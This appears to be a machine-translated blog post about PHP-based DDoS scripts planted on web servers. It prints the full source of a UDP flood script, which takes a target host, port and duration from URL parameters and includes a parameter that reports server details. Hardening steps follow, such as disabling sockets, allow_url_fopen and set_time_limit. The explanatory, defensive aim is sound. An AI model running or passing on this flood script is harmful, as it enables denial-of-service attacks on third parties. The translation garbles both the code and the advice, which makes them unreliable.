Solution to phpddos attacks (the server sends a large number of packets to the Internet)

First look at the source code

The code is as follows:

Copy code

<? Php Set_time_limit (999999 ); $ Host = $ _ GET ['host']; $ Port = $ _ GET ['port']; $ Exec_time = $ _ GET ['Time']; $ Sendlen = 65535; $ Packets = 0; Ignore_user_abort (True ); If (StrLen ($ host) = 0 or StrLen ($ port) = 0 or StrLen ($ exec_time) = 0 ){ If (StrLen ($ _ GET ['Rat ']) <> 0 ){ Echo $ _ GET ['Rat ']. $ _ SERVER ["HTTP_HOST"]. "|". GetHostByName ($ _ SERVER ['Server _ name']). "| ". php_uname (). "| ". $ _ SERVER ['server _ soft']. $ _ GET ['Rat ']; Exit;             } Echo "Parameters can not be empty! "; Exit;     } For ($ I = 0; $ I <$ Sendlen; $ I ++ ){ $ Out. = "";     } $ Max_time = time () + $ exec_time; While (1 ){ $ Packets ++; If (time ()> $ max_time ){ Break;     } $ Fp = fsockopen ("udp: // $ host", $ port, $ errno, $ errstr, 5 ); If ($ fp ){ Fwrite ($ fp, $ out ); Fclose ($ fp );     } } Echo "Send Host: $ host: $ port <br> "; Echo "Send Flow: $ packets * ($ Sendlen/1024 =". round ($ Sendlen/1024, 2). ") kb/1024 = ". Round ($ packets * $ Sendlen/1024/1024, 2). "mb <br> "; Echo "Send Rate:". round ($ packets/$ exec_time, 2). "packs/s;". round ($ packets/ $ Exec_time * $ Sendlen/1024/1024, 2). "mb/s "; ?>

The key code is

The code is as follows:	Copy code
$ Fp = fsockopen ("udp: // $ ip", $ rand, $ errno, $ errstr, 5 );

The method is very simple. When a UDP packet is sent to the target host and an infinite Endless loop is defined, a great deal of pressure will be generated.
This pressure is for the server that executes this script, because it first occupies a large amount of resources such as its network width and CPU.
If you want to use this script to put pressure on the target site, you need to execute this script on multiple servers. What about DDOS?

Since fsockopen is used for external requests, it is not allowed to request
Set in php. ini

The code is as follows:	Copy code
Allow_url_fopen = Off

In this case, he can still send packets.

The code is as follows:	Copy code
Extension = php_sockets.dll Change ; Extension = php_sockets.dll

Restart APACHE, IIS, and NGINX
This prevents php ddos packets.

Some netizens said

It is easy to set the script not to allow timeout. 1. Disable the set_time_limit function. 2. Enable the safe mode of PHP (safe_mode = on)

Disabling the socket function can directly disable all socket modules or disable the fsockopen function,

We recommend that you enable the security mode directly because the socket is often used to retrieve the password for sending emails.

In this case, the script times out every 30 seconds. It is estimated that no hacker is lonely and starts DDOS attacks every 30 seconds...

Experience: This problem is generally caused by website security. We should pay attention to website security and server security, so that it is not easy to be infiltrated. If macow.com's friends are used, it will be better to restrict the website.